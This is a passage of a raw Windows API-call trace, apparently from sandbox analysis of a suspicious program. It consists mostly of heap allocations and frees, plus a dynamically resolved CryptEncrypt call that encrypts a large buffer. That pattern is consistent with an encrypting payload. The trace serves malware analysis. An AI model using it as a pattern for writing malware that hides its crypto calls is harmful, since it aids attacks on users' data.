(HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0141.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0141.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0141.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0141.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0141.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0141.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0141.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0141.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0141.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0141.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0141.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0141.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0141.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0141.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0141.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0141.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0141.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0141.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0141.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0141.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0141.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0141.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0141.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0141.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0141.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0141.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0141.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0141.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0141.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0141.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0141.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0141.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0141.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0141.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0141.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0141.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0141.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0141.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0141.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0141.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0141.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0141.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0141.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0141.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0141.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0141.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0141.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0141.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0141.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0141.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0141.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0141.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0141.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0141.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0141.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0141.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0141.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0141.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0141.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0141.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0141.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0141.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0141.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50a40 [0141.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0141.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0141.449] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0141.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0141.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54198 [0141.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0141.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0141.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0141.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0141.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0141.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0141.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0141.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0141.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0141.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0141.450] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2eb0ea0*, pdwDataLen=0x8cef60*=0x185aa, dwBufLen=0x185b0 | out: pbData=0x2eb0ea0*, pdwDataLen=0x8cef60*=0x185b0) returned 1 [0141.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0141.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0141.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0141.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0141.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0141.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0141.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0141.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0141.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0141.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0141.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0141.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0141.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0141.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0141.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0141.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0141.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0141.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0141.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0141.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0141.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0141.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0141.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0141.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0141.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0141.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0141.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0141.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0141.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0141.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0141.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0141.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0141.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0141.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0141.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0141.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0141.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0141.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0141.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0141.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0141.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0141.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0141.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0141.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0141.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0141.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0141.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0141.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 